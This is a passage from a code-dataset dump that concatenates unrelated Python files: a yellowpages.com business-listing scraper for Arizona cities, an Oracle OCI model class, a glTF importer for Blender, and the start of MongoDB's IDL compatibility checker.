Services','Number Plate Manufacturers','Nursing Colleges','Nutritional Supplement Dealers','Office Furniture','Offices','Offset Printers','Old Age Homes','Old Cut Notes Exchange Services','Online Classes','Optics & Eyewear','Organ Donation Centres','Orphanages & Shelters','Orthodox 
Churches','Other Vehicles','Outdoor Advertising','Outdoor Catering Services','Outdoor Furniture','Overseas Education Consultants','Oxygen Concentrators','Oxygen Gas Dealers','P R P Hair Treatments','Packers And Movers','Packing Machine Manufacturers','Painters','Painting Suppliers','Pan Shops','Pants','Paper Rolls Manufacturers','Paper Stores','Parks','Part Time Jobs Consultancies','Party Halls','Passport Offices','Pawn Brokers','Pcs & Desktops','Pedicure & Manicure','Pen Stores','Pentecostal Churches','Perforated Sheet Manufacturers','Perfumes','Personal Fitness Trainers','Personality Development Training Institutes','Pest Control Services','Pet Shops','Pets','PG Colleges','Pharmaceutical Companies','Pharmaceutical Packaging Material Dealers','Pharmacies','Pharmacy Colleges','Photo Frames','Photo Studios','Photocopiers','Photographers','Photography Training Institutes','physiotherapist','Physiotherapy Clinics','Piercing','Pilot Training Institutes','Pipe Dealers','Pizza Restaurants','Placement Consultants','Plants','Plastic & Disposable Items','Plastic Injection Moulding Machine Dealer','Plastic Products Manufacturers','Play Schools','Play Stations','Playground Equipments','Playgrounds','Plumbers','Plumbing','Plywood & Laminates','Police Stations','Political Party Offices','Pollution Inspection Stations','Polymers & Asbestos Products Dealer','Polytechnic Colleges','Pork Shops','Post Offices','Power Generator Suppliers','Power Stations','Power Tools Dealers','Presbyterian Churches','Printed Circuit Board Dealers','Printers','Printing & Stationaries','Printing Machines','Printing Materials','Printing Press','Professional Services','Professionals','Project Management Training Institutes','Projectors','Promotional Products','Property Consultants','Property Dealers','Protestant Churches','Public Safety Offices','Pubs','Pumps & Controllers','Pundits','PVC Pipe Dealer','Quaker Churches','Quick Bites','Radio Jockey Training Institutes','Radio Stations','Radium Works','Railings','Railway Cargo Agents','Railway Stations','Ready Made Garments','Ready Mix Concrete','Real Estate','Real Estate Agents','Real Estate Developers','Real Estate Loans & Mortgages','Recording Studios','Reformed Churches','Refrigerator Repair','Refrigerators','Registry Offices','Rehabilitation Centres','Religion','Research Institutes','Residential Designers','Resins & Chemicals Manufacturer','Resorts','Restaurant Test','Restaurants','RO Water Purifier','Road Cargo Agents','Robotics Engineering','Robotics Training Institutes','Roofing Sheets','RTA Offices','Rubber Oil Seals Dealer','Rubber Product Dealer','Rubber Product Manufacturers','Rubber Stamps','Rudraksha','Russian Orthodox Churches','Sand Materials','Sandals & Floaters','Sanitaryware & Bathroom Accessories','Sarees & Blouses','Scalp Treatments','School District Offices','School For Mentally Challenged','Scrap Dealers','Screen Printers','Sea Cargo Agents','Seat Cover & Rexine Works','Security Guard Services','Security Services','Security Systems','Seeds','SelfDefence Training Services','Servers','Service Centres','Serviced Apartments','Seventh-Day Adventist Churches','Sewing Machine Dealers','Share Brokers','Shipping Companies','Shirts','Shoes','Shopping Malls','Shorts & Cargo','Sign Boards','Signage','Singing Classes','Skin Care Clinics','Snooker Parlours','Socks','Sofa Sets','Software & IT Services','Software Certifications','Software Dealers','Software Development','Software Training Institutes','Solar Products Manufacturers','Sound And Lighting On Hire','Sound 
Systems','Spa & Saloon','Spare Part Dealers','Spare Parts & Accessories','Speakers','Spiritual And Pooja Accessories','Spiritual Centres','Spoken English Institutes','Sports','Sports Academies','Sports Clubs','Sports Equipments','Sports Stores','Sports Wear','Sports, Entertainment & Hobbies','Stadiums','Stage Decorations','Stainless Steel Pipe Dealer','Stamp Papers','Standees & Demo Tents','State Board Schools','State Government Offices','Stationaries','Stationary Stores','Stations','Steel Wires & Ropes Manufacturers','Stem Cell Banking','Stock Brokers','Studios','Study Hall Centre','Sub-Registrar Offices','Suitings & Shirtings','Suits And Blazers','Sulphuric Acid Dealers','Sunglasses','Super Specialty Hospitals','Supermarkets','Surgical Instruments','Sweet Shops','Swimming Pools','Table Accessories','Tailoring Materials','Tailors','Tailors & Designers','Take Away Restaurants','Tattoo Makers','Telecommunications','Television Installation','Televisions','Temples','Tent Houses','Textiles','Theaters','Theme Parks','Thermocol Dealers','Ticketing','Tiles','Timber Depot','Tmt Iron & Steel Bars','Tours And Travels','Toy Shops','Trading Consultants','Training Institutes','Transportation','Travel Agencies','Travel Goods','Travel Services','Trophy & Momento Dealers','Trousers','T-Shirts','Tuitions','Tv Accessories','TV Studio','Two Wheelers Dealers','Two Wheelers Service Centres','Typing Institutes','Tyre Dealers','Unani Treatment','Underground Stations','Uniforms','Unitarian Universalist Churches','United Churches Of Christ','Unity Churches','Universities','UPS','UPSC & IAS Coaching Centres','Used Auto Dealers','Used Bike Dealers','Used Cars Dealers','Utensils','UV Water Purifier','Valve Dealer','Vegetables','Vehicle Glass Dealers','Vehicle On Hire','Vending Machine Manufacturer','Veterinary Hospitals','Veterinary Medicines','Video Editing Studios','Video Gaming Centres','Videographers','Vineyard Churches','Vinyl Flooring','Vocational Colleges','Wall Papers','Washing Machine Repair','Washing Machines','Water Cooler Suppliers','Water Parks','Water Purifier Dealers','Water Purifier Repairs','Water Softeners','Water Suppliers','Water Tank Suppliers','Waterproofing','Waterproofing Materials','Weather Stations','Web Designing Companies','Web Hosting Companies','Wedding & Events','Wedding Bands','Wedding Cards','Wedding Catering Services','Wedding Decorations','Wedding Planners','Weight Loss & Gain Centres','Welding Equipment','Welfare Offices','Wesleyan Churches','Wet Grinder Dealers','Wine Shops','Winter Wear','Wire Mesh Dealers','Womens Hostels','Wooden Flooring','Wrist Watch Repairs and Services','Wrist Watches','Xerox Shops','Yoga Centres','Zoo Parks','Zumba Fitness']\n\ncities = ['Ajo','Ak-Chin Village','Amado','Apache Junction','Arizona City','Arizona Village','Ash Fork','Avondale','Avra Valley','Bagdad','Benson','Big Park','Bisbee','Bitter Springs','Black Canyon City','Blackwater','Bluewater','Bouse','Buckeye','Bullhead City','Burnside','Cameron','Camp Verde','Canyon Day','Carefree','Casa Grande','Casas Adobes','Catalina','Catalina Foothills','Cave Creek','Central Heights-Midland City','Chandler','Chilchinbito','Chinle','Chino Valley','Chuichu','Cibecue','Cibola','Clarkdale','Claypool','Clifton','Colorado City','Congress','Coolidge','Cordes Lakes','Cornville','Corona de Tucson','Cottonwood','Cottonwood-Verde Village','Dennehotso','Desert Hills','Dewey-Humboldt','Dilkon','Dolan Springs','Douglas','Drexel-Alvernon','Drexel Heights','Dudleyville','Duncan','Eagar','East Fork','East 
Sahuarita','Ehrenberg','Elgin','El Mirage','Eloy','First Mesa','Flagstaff','Florence','Flowing Wells','Fort Defiance','Fortuna Foothills','Fountain Hills','Fredonia','Gadsden','Ganado','Gila Bend','Gilbert','Gisela','Glendale','Globe','Gold Camp','Golden Valley','Goodyear','Grand Canyon Village','Greasewood','Green Valley','Guadalupe','Hayden','Heber-Overgaard','Holbrook','Hotevilla-Bacavi','Houck','Huachuca City','Jeddito','Jerome','Kachina Village','Kaibab','Kaibito','Kayenta','Keams Canyon','Kearny','Kingman','Kykotsmovi Village','Lake Havasu City','Lake Montezuma','Lechee','Leupp','Litchfield Park','Littletown','Lukachukai','McNary','Mammoth','Many Farms','Marana','Maricopa','Mayer','Mesa','Mesquite Creek','Miami','Moenkopi','Mohave Valley','Mojave Ranch Estates','Morenci','Mountainaire','Munds Park','Naco','Nazlini','New Kingman-Butler','New River','Nogales','Oljato-Monument Valley','Oracle','Oro Valley','Page','Paradise Valley','Parker','Parker Strip','Parks','Patagonia','Paulden','Payson','Peach Springs','Peeples Valley','Peoria','Peridot','Phoenix','Picture Rocks','Pima','Pine','Pinetop-Lakeside','Pinon','Pirtleville','Pisinemo','Poston','Prescott','Prescott Valley','Quartzsite','Queen Creek','Queen Valley','Red Mesa','Rio Rico Northeast','Rio Rico Northwest','Rio Rico Southeast','Rio Rico Southwest','Rio Verde','Rock Point','Rough Rock','Round Rock','Sacaton','Safford','Sahuarita','St. David','St. Johns','St. Michaels','Salome','San Carlos','San Luis','San Manuel','Santan','Santa Rosa','Sawmill','Scottsdale','Second Mesa','Sedona','Seligman','Sells','Shongopovi','Shonto','Show Low','Sierra Vista','Sierra Vista Southeast','Snowflake','Somerton','Sonoita','South Tucson','Springerville','Spring Valley','Stanfield','Steamboat','Strawberry','Summit','Sun City','Sun City West','Sun Lakes','Sun Valley','Supai','Superior','Surprise','Swift Trail Junction','Tacna','Tanque Verde','Taylor','Teec Nos Pos','Tempe','Thatcher','Three Points','Tolleson','Tombstone','Tonalea','Tonto Basin','Top-of-the-World','Tortolita','Tsaile','Tubac','Tuba City','Tucson','Tucson Estates','Tumacacori-Carmen','Tusayan','Vail','Valencia West','Wellton','Wenden','Whetstone','Whiteriver','Wickenburg','Wilhoit','Willcox','Williams','Williamson','Willow Valley','Window Rock','Winkelman','Winslow','Winslow West','Yarnell','Young','Youngtown','Yuma']\n\ndef parse_listing(keyword,place):\n\n \"\"\"\n\n\n\n Function to process yellowpage listing page\n\n : param keyword: search query\n\n : param place : place name\n\n\n\n \"\"\"\n\n url = \"https://www.yellowpages.com/search?search_terms={0}&geo_location_terms={1}\".format(keyword,place)\n\n print(\"retrieving \",url)\n\n\n\n headers = {'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n\n 'Accept-Encoding':'gzip, deflate, br',\n\n 'Accept-Language':'en-GB,en;q=0.9,en-US;q=0.8,ml;q=0.7',\n\n 'Cache-Control':'max-age=0',\n\n 'Connection':'keep-alive',\n\n 'Host':'www.yellowpages.com',\n\n 'Upgrade-Insecure-Requests':'1',\n\n 'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'\n\n }\n\n # Adding retries\n\n for retry in range(10):\n\n try:\n\n response = requests.get(url,verify=True, headers = headers )\n\n print(\"parsing page\")\n\n if response.status_code==200:\n\n parser = html.fromstring(response.text)\n\n #making links absolute\n\n base_url = \"https://www.yellowpages.com\"\n\n parser.make_links_absolute(base_url)\n\n\n\n XPATH_LISTINGS = 
\"//div[@class='search-results organic']//div[@class='v-card']\"\n\n listings = parser.xpath(XPATH_LISTINGS)\n\n scraped_results = []\n\n\n\n for results in listings:\n\n XPATH_BUSINESS_NAME = \".//a[@class='business-name']//text()\"\n\n\n\n XPATH_WEBSITE = \".//div[@class='info']//div[contains(@class,'info-section')]//div[@class='links']//a[contains(@class,'website')]/@href\"\n\n\n\n raw_business_name = results.xpath(XPATH_BUSINESS_NAME)\n\n\n\n raw_website = results.xpath(XPATH_WEBSITE)\n\n\n\n\n\n business_name = ''.join(raw_business_name).strip() if raw_business_name else None\n\n\n\n website = ''.join(raw_website).strip() if raw_website else None\n\n\n business_details = {\n\n 'business_name':business_name,\n\n\n\n 'website':website,\n\n 'industry':keyword,\n\n 'city': city,\n\n 'state': 'AZ'\n\n\n }\n if(website != '' and website != None):\n scraped_results.append(business_details)\n\n\n\n #print(scraped_results)\n\n return scraped_results\n\n\n\n elif response.status_code==404:\n\n print(\"Could not find a location matching\",place)\n\n #no need to retry for non existing page\n\n return []\n\n else:\n\n print(\"Failed to process page\")\n\n return []\n\n\n\n except:\n\n print(\"Failed to process page\")\n\n return []\n\n\n\n\n\ndef runtime(word, place):\n\n keyword = word\n\n place = place\n\n scraped_data = parse_listing(keyword,place)\n\n if(scraped_data):\n return scraped_data\n\n else:\n return []\n\n\nif __name__==\"__main__\":\n\n\n\n for city in cities:\n final_list = []\n for elem in categories:\n\n final_list.append(runtime(elem, city + ',' + state))\n\n print('STARTING FILE WRITE')\n\n print(\"Writing scraped data to %s-%s-yellowpages-scraped-links.csv\"%(city, state))\n\n\n with open('%s-%s-yellowpages-scraped-links.csv'%(city,state),'ab') as csvfile:\n fieldnames = ['business_name', 'website', 'industry', 'city', 'state']\n\n writer = csv.DictWriter(csvfile, fieldnames = fieldnames, quoting=csv.QUOTE_ALL)\n\n writer.writeheader()\n\n for data in final_list:\n for keys in data:\n writer.writerow(keys)\n\n\n\n\n\n print('DONE. Kendall is Awesome.')\n"} {"ext": "py", "sha": "1a30f161892ee8ec35435409b368ed30822db5e1", "content": "# coding: utf-8\n# Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved.\n# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. 
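# Illustrative sketch (not part of the archived scraper file above): parse_listing() relies on
# `requests` and lxml's `html.fromstring`, so the file assumes imports along these lines. The
# helper name `fetch_listing_page`, the timeout, and the backoff value are hypothetical, added
# only to show how the retry loop can actually retry (with a pause) instead of returning on the
# first failed attempt; the browser-style headers used above can be passed via `headers=`.
import time

import requests
from lxml import html


def fetch_listing_page(keyword, place, retries=10, backoff_seconds=2):
    """Fetch one yellowpages search-results page and return an lxml tree, or None on failure."""
    url = ("https://www.yellowpages.com/search"
           "?search_terms={0}&geo_location_terms={1}").format(keyword, place)
    for _attempt in range(retries):
        try:
            response = requests.get(url, verify=True, timeout=30)
            if response.status_code == 200:
                tree = html.fromstring(response.text)
                # Make listing links absolute, as the scraper above does.
                tree.make_links_absolute("https://www.yellowpages.com")
                return tree
            if response.status_code == 404:
                return None  # location does not exist; retrying will not help
        except requests.RequestException:
            pass  # network hiccup: fall through and retry instead of giving up immediately
        time.sleep(backoff_seconds)
    return None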
You may choose either license.\n\n\nfrom oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401\nfrom oci.decorators import init_model_state_from_kwargs\n\n\n@init_model_state_from_kwargs\nclass AvailableRegionSummary(object):\n \"\"\"\n The summary of region availability for a subscription.\n \"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Initializes a new AvailableRegionSummary object with values from keyword arguments.\n The following keyword arguments are supported (corresponding to the getters/setters of this class):\n\n :param region_name:\n The value to assign to the region_name property of this AvailableRegionSummary.\n :type region_name: str\n\n \"\"\"\n self.swagger_types = {\n 'region_name': 'str'\n }\n\n self.attribute_map = {\n 'region_name': 'regionName'\n }\n\n self._region_name = None\n\n @property\n def region_name(self):\n \"\"\"\n **[Required]** Gets the region_name of this AvailableRegionSummary.\n Region availability for the subscription.\n\n\n :return: The region_name of this AvailableRegionSummary.\n :rtype: str\n \"\"\"\n return self._region_name\n\n @region_name.setter\n def region_name(self, region_name):\n \"\"\"\n Sets the region_name of this AvailableRegionSummary.\n Region availability for the subscription.\n\n\n :param region_name: The region_name of this AvailableRegionSummary.\n :type: str\n \"\"\"\n self._region_name = region_name\n\n def __repr__(self):\n return formatted_flat_dict(self)\n\n def __eq__(self, other):\n if other is None:\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n return not self == other\n"} {"ext": "py", "sha": "1a30f2427bb8864840fc93ce3c057964da01f0a0", "content": "# Copyright 2009 the Melange authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Package containing tests for Melange GHOP module.\n\"\"\"\n"} {"ext": "py", "sha": "1a30f2586e14f93b93da054d4543528d1063ac2c", "content": "# Copyright 2018-2019 The glTF-Blender-IO authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom ..com.gltf2_io import gltf_from_dict\nfrom ..com.gltf2_io_debug import Log\nimport logging\nimport json\nimport struct\nimport base64\nfrom os.path import dirname, join, isfile, basename\nfrom urllib.parse import unquote\n\n\nclass glTFImporter():\n \"\"\"glTF Importer class.\"\"\"\n\n def __init__(self, filename, import_settings):\n \"\"\"initialization.\"\"\"\n self.filename = filename\n self.import_settings = import_settings\n self.glb_buffer = 
None\n self.buffers = {}\n self.accessor_cache = {}\n\n if 'loglevel' not in self.import_settings.keys():\n self.import_settings['loglevel'] = logging.ERROR\n\n log = Log(import_settings['loglevel'])\n self.log = log.logger\n self.log_handler = log.hdlr\n\n self.SIMPLE = 1\n self.TEXTURE = 2\n self.TEXTURE_FACTOR = 3\n\n # TODO: move to a com place?\n self.extensions_managed = [\n 'KHR_materials_pbrSpecularGlossiness',\n 'KHR_lights_punctual',\n 'KHR_materials_unlit',\n 'KHR_texture_transform'\n ]\n\n # TODO : merge with io_constants\n self.fmt_char_dict = {}\n self.fmt_char_dict[5120] = 'b' # Byte\n self.fmt_char_dict[5121] = 'B' # Unsigned Byte\n self.fmt_char_dict[5122] = 'h' # Short\n self.fmt_char_dict[5123] = 'H' # Unsigned Short\n self.fmt_char_dict[5125] = 'I' # Unsigned Int\n self.fmt_char_dict[5126] = 'f' # Float\n\n self.component_nb_dict = {}\n self.component_nb_dict['SCALAR'] = 1\n self.component_nb_dict['VEC2'] = 2\n self.component_nb_dict['VEC3'] = 3\n self.component_nb_dict['VEC4'] = 4\n self.component_nb_dict['MAT2'] = 4\n self.component_nb_dict['MAT3'] = 9\n self.component_nb_dict['MAT4'] = 16\n\n @staticmethod\n def bad_json_value(val):\n \"\"\"Bad Json value.\"\"\"\n raise ValueError('Json contains some unauthorized values')\n\n def checks(self):\n \"\"\"Some checks.\"\"\"\n if self.data.asset.version != \"2.0\":\n return False, \"glTF version must be 2\"\n\n if self.data.extensions_required is not None:\n for extension in self.data.extensions_required:\n if extension not in self.data.extensions_used:\n return False, \"Extension required must be in Extension Used too\"\n if extension not in self.extensions_managed:\n return False, \"Extension \" + extension + \" is not available on this addon version\"\n\n if self.data.extensions_used is not None:\n for extension in self.data.extensions_used:\n if extension not in self.extensions_managed:\n # Non blocking error #TODO log\n pass\n\n return True, None\n\n def load_glb(self):\n \"\"\"Load binary glb.\"\"\"\n header = struct.unpack_from('<4sII', self.content)\n self.format = header[0]\n self.version = header[1]\n self.file_size = header[2]\n\n if self.format != b'glTF':\n return False, \"This file is not a glTF/glb file\"\n\n if self.version != 2:\n return False, \"GLB version %d unsupported\" % self.version\n\n if self.file_size != len(self.content):\n return False, \"Bad GLB: file size doesn't match\"\n\n offset = 12 # header size = 12\n\n # JSON chunk is first\n type_, len_, json_bytes, offset = self.load_chunk(offset)\n if type_ != b\"JSON\":\n return False, \"Bad GLB: first chunk not JSON\"\n if len_ != len(json_bytes):\n return False, \"Bad GLB: length of json chunk doesn't match\"\n try:\n json_str = str(json_bytes, encoding='utf-8')\n json_ = json.loads(json_str, parse_constant=glTFImporter.bad_json_value)\n self.data = gltf_from_dict(json_)\n except ValueError as e:\n return False, e.args[0]\n\n # BIN chunk is second (if it exists)\n if offset < len(self.content):\n type_, len_, data, offset = self.load_chunk(offset)\n if type_ == b\"BIN\\0\":\n if len_ != len(data):\n return False, \"Bad GLB: length of BIN chunk doesn't match\"\n self.glb_buffer = data\n\n return True, None\n\n def load_chunk(self, offset):\n \"\"\"Load chunk.\"\"\"\n chunk_header = struct.unpack_from('<I4s', self.content, offset)\n data_length = chunk_header[0]\n data_type = chunk_header[1]\n data = self.content[offset + 8: offset + 8 + data_length]\n\n return data_type, data_length, data, offset + 8 + data_length\n\n def read(self):\n \"\"\"Read 
file.\"\"\"\n # Check this is a file\n if not isfile(self.filename):\n return False, \"Please select a file\"\n\n # Check if file is gltf or glb\n with open(self.filename, 'rb') as f:\n self.content = memoryview(f.read())\n\n self.is_glb_format = self.content[:4] == b'glTF'\n\n # glTF file\n if not self.is_glb_format:\n content = str(self.content, encoding='utf-8')\n self.content = None\n try:\n self.data = gltf_from_dict(json.loads(content, parse_constant=glTFImporter.bad_json_value))\n return True, None\n except ValueError as e:\n return False, e.args[0]\n\n # glb file\n else:\n # Parsing glb file\n success, txt = self.load_glb()\n self.content = None\n return success, txt\n\n def is_node_joint(self, node_idx):\n \"\"\"Check if node is a joint.\"\"\"\n if not self.data.skins: # if no skin in gltf file\n return False, None\n\n for skin_idx, skin in enumerate(self.data.skins):\n if node_idx in skin.joints:\n return True, skin_idx\n\n return False, None\n\n def load_buffer(self, buffer_idx):\n \"\"\"Load buffer.\"\"\"\n buffer = self.data.buffers[buffer_idx]\n\n if buffer.uri:\n data, _file_name = self.load_uri(buffer.uri)\n if data is not None:\n self.buffers[buffer_idx] = data\n\n else:\n # GLB-stored buffer\n if buffer_idx == 0 and self.glb_buffer is not None:\n self.buffers[buffer_idx] = self.glb_buffer\n\n def load_uri(self, uri):\n \"\"\"Loads a URI.\n Returns the data and the filename of the resource, if there is one.\n \"\"\"\n sep = ';base64,'\n if uri.startswith('data:'):\n idx = uri.find(sep)\n if idx != -1:\n data = uri[idx + len(sep):]\n return memoryview(base64.b64decode(data)), None\n\n path = join(dirname(self.filename), unquote(uri))\n try:\n with open(path, 'rb') as f_:\n return memoryview(f_.read()), basename(path)\n except Exception:\n self.log.error(\"Couldn't read file: \" + path)\n return None, None\n\n"} {"ext": "py", "sha": "1a30f28c186d1cd68412be7a4f52b0844039bfa1", "content": "from sys import path\n\npath.append('/home/joerojas/Desarrollo/Curso-Basico-Python/102_misPaquetes/packages')\n\nimport extra.iota\n\nprint(extra.iota.FunI())"} {"ext": "py", "sha": "1a30f29428a6eeb9c34a6ecedb3de29fa9f068db", "content": "# Copyright (C) 2021-present MongoDB, Inc.\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the Server Side Public License, version 1,\n# as published by MongoDB, Inc.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# Server Side Public License for more details.\n#\n# You should have received a copy of the Server Side Public License\n# along with this program. If not, see\n# <http://www.mongodb.com/licensing/server-side-public-license>.\n#\n# As a special exception, the copyright holders give permission to link the\n# code of portions of this program with the OpenSSL library under certain\n# conditions as described in each individual source file and distribute\n# linked combinations including the program with the OpenSSL library. You\n# must comply with the Server Side Public License in all respects for\n# all of the code used other than as permitted herein. If you modify file(s)\n# with this exception, you may extend this exception to your version of the\n# file(s), but you are not obligated to do so. If you do not wish to do so,\n# delete this exception statement from your version. 
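# Illustrative sketch (synthetic bytes, not part of the archived importer above): the GLB
# container parsed by load_glb()/load_chunk() is a 12-byte header (magic, version, total size)
# followed by length-prefixed chunks. The sample below only demonstrates the same struct
# formats ('<4sII' for the header, '<I4s' for a chunk header) round-tripping on a minimal blob.
import struct

json_payload = b'{"asset":{"version":"2.0"}}'
# Pad the JSON chunk to a 4-byte boundary, as glTF 2.0 requires for GLB chunks.
json_payload += b" " * (-len(json_payload) % 4)
chunk = struct.pack("<I4s", len(json_payload), b"JSON") + json_payload
blob = struct.pack("<4sII", b"glTF", 2, 12 + len(chunk)) + chunk

magic, version, total_size = struct.unpack_from("<4sII", blob)
assert (magic, version, total_size) == (b"glTF", 2, len(blob))

offset = 12  # header size, exactly as in load_glb()
chunk_length, chunk_type = struct.unpack_from("<I4s", blob, offset)
chunk_data = blob[offset + 8: offset + 8 + chunk_length]
assert chunk_type == b"JSON" and chunk_data == json_payload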
If you delete this\n# exception statement from all source files in the program, then also delete\n# it in the license file.\n#\n# pylint: disable=too-many-lines\n\"\"\"Checks compatibility of old and new IDL files.\n\nIn order to support user-selectable API versions for the server, server commands are now\ndefined using IDL files. This script checks that old and new commands are compatible with each\nother, which allows commands to be updated without breaking the API specifications within a\nspecific API version.\n\nThis script accepts two directories as arguments, the \"old\" and the \"new\" IDL directory.\nBefore running this script, run checkout_idl_files_from_past_releases.py to find and create\ndirectories containing the old IDL files from previous releases.\n\"\"\"\n\nimport argparse\nimport os\nimport sys\nfrom dataclasses import dataclass\nfrom enum import Enum\nfrom typing import Dict, List, Set, Optional, Tuple, Union\n\nfrom idl import parser, syntax, errors, common\nfrom idl.compiler import CompilerImportResolver\nfrom idl_compatibility_errors import IDLCompatibilityContext, IDLCompatibilityErrorCollection\n\nALLOW_ANY_TYPE_LIST: List[str] = [\n # This list if only used in unit-tests.\n \"commandAllowedAnyTypes\",\n \"commandAllowedAnyTypes-param-anyTypeParam\",\n \"commandAllowedAnyTypes-reply-anyTypeField\",\n \"oldTypeBsonAnyAllowList\",\n \"newTypeBsonAnyAllowList\",\n \"oldReplyFieldTypeBsonAnyAllowList-reply-oldBsonSerializationTypeAnyReplyField\",\n \"newReplyFieldTypeBsonAnyAllowList-reply-newBsonSerializationTypeAnyReplyField\",\n \"oldParamTypeBsonAnyAllowList-param-bsonTypeAnyParam\",\n \"newParamTypeBsonAnyAllowList-param-bsonTypeAnyParam\",\n \"commandAllowedAnyTypesWithVariant-reply-anyTypeField\",\n \"replyFieldTypeBsonAnyWithVariant-reply-bsonSerializationTypeAnyStructField\",\n \"replyFieldTypeBsonAnyWithVariantWithArray-reply-bsonSerializationTypeAnyStructField\",\n \"parameterFieldTypeBsonAnyWithVariant-param-bsonSerializationTypeAnyStructField\",\n \"parameterFieldTypeBsonAnyWithVariantWithArray-param-bsonSerializationTypeAnyStructField\",\n \"commandTypeBsonAnyWithVariant\",\n \"commandTypeBsonAnyWithVariantWithArray\",\n \"replyFieldCppTypeNotEqual-reply-cppTypeNotEqualReplyField\",\n \"commandCppTypeNotEqual\",\n \"commandParameterCppTypeNotEqual-param-cppTypeNotEqualParam\",\n \"replyFieldSerializerNotEqual-reply-serializerNotEqualReplyField\",\n \"commandSerializerNotEqual\",\n \"commandParameterSerializerNotEqual-param-serializerNotEqualParam\",\n \"replyFieldDeserializerNotEqual-reply-deserializerNotEqualReplyField\",\n \"commandDeserializerNotEqual\",\n \"commandParameterDeserializerNotEqual-param-deserializerNotEqualParam\",\n \"newlyAddedReplyFieldTypeBsonAnyAllowed-reply-newlyAddedBsonSerializationTypeAnyReplyField\",\n \"replyFieldTypeBsonAnyWithVariantUnstable-reply-bsonSerializationTypeWithVariantAnyUnstableReplyField\",\n \"newlyAddedParamBsonAnyAllowList-param-newlyAddedBsonAnyAllowListParam\",\n \"newlyAddedTypeFieldBsonAnyAllowList\",\n \"parameterFieldTypeBsonAnyWithVariantUnstable-param-bsonSerializationTypeAnyStructField\",\n \"commandTypeBsonAnyWithVariantUnstable\",\n \"commandParameterCppTypeNotEqualUnstable-param-cppTypeNotEqualParam\",\n \"replyFieldCppTypeNotEqualUnstable-reply-cppTypeNotEqualReplyUnstableField\",\n \"commandCppTypeNotEqualUnstable\",\n \"commandParameterSerializerNotEqualUnstable-param-serializerNotEqualParam\",\n \"replyFieldSerializerNotEqualUnstable-reply-serializerNotEqualReplyUnstableField\",\n 
\"commandSerializerNotEqualUnstable\",\n \"commandParameterDeserializerNotEqualUnstable-param-deserializerNotEqualParam\",\n \"replyFieldDeserializerNotEqualUnstable-reply-deserializerNotEqualReplyUnstableField\",\n \"commandDeserializerNotEqualUnstable\",\n 'create-param-backwards',\n 'saslStart-param-payload',\n 'saslStart-param-payload',\n 'saslStart-reply-payload',\n 'saslContinue-param-payload',\n 'saslContinue-reply-payload',\n\n # These commands (aggregate, find, update, delete, findAndModify, explain) might contain some\n # fields with type `any`. Currently, it's not possible to avoid the `any` type in those cases.\n # Instead, here are the preventive measures in-place to catch unintentional breaking changes:\n # 1- Added comments on top of custom serializers/deserializers (related to these fields) to\n # let the future developers know that their modifications to these methods might lead to\n # a breaking change in the API.\n # 2- Added proper unit-tests to catch accidental changes to the custom serializers/deserializers\n # by over-fitting on the current implementation of these custom serializers/deserializers.\n # 3- Added further checks to the current script (idl_check_compatibility.py) to check for\n # changing a custom serializer/deserializer and considering it as a potential breaking\n # change.\n 'aggregate-param-pipeline',\n 'aggregate-param-explain',\n 'aggregate-param-allowDiskUse',\n 'aggregate-param-cursor',\n 'aggregate-param-hint',\n 'aggregate-param-needsMerge',\n 'aggregate-param-fromMongos',\n 'aggregate-param-$_requestReshardingResumeToken',\n 'aggregate-param-isMapReduceCommand',\n 'count-param-hint',\n 'count-param-limit',\n 'count-param-maxTimeMS',\n 'find-param-filter',\n 'find-param-projection',\n 'find-param-sort',\n 'find-param-hint',\n 'find-param-collation',\n 'find-param-singleBatch',\n 'find-param-allowDiskUse',\n 'find-param-min',\n 'find-param-max',\n 'find-param-returnKey',\n 'find-param-showRecordId',\n 'find-param-$queryOptions',\n 'find-param-tailable',\n 'find-param-oplogReplay',\n 'find-param-noCursorTimeout',\n 'find-param-awaitData',\n 'find-param-allowPartialResults',\n 'find-param-readOnce',\n 'find-param-allowSpeculativeMajorityRead',\n 'find-param-$_requestResumeToken',\n 'find-param-$_resumeAfter',\n 'find-param-maxTimeMS',\n 'update-param-u',\n 'update-param-hint',\n 'update-param-upsertSupplied',\n 'update-reply-_id',\n 'delete-param-limit',\n 'delete-param-hint',\n 'findAndModify-param-hint',\n 'findAndModify-param-update',\n 'findAndModify-reply-upserted',\n 'insert-reply-opTime',\n 'update-reply-opTime',\n 'delete-reply-opTime',\n 'aggregate-reply-partialResultsReturned',\n 'aggregate-reply-invalidated',\n 'find-reply-partialResultsReturned',\n 'find-reply-invalidated',\n 'getMore-reply-partialResultsReturned',\n 'getMore-reply-invalidated',\n]\n\n# Do not add user visible fields already released in earlier versions.\nIGNORE_UNSTABLE_LIST: List[str] = [\n # The 'originalSpec' field was introduced in v5.1 behind a disabled feature flag and is not user\n # visible. This is part of the listIndexes output when executed against 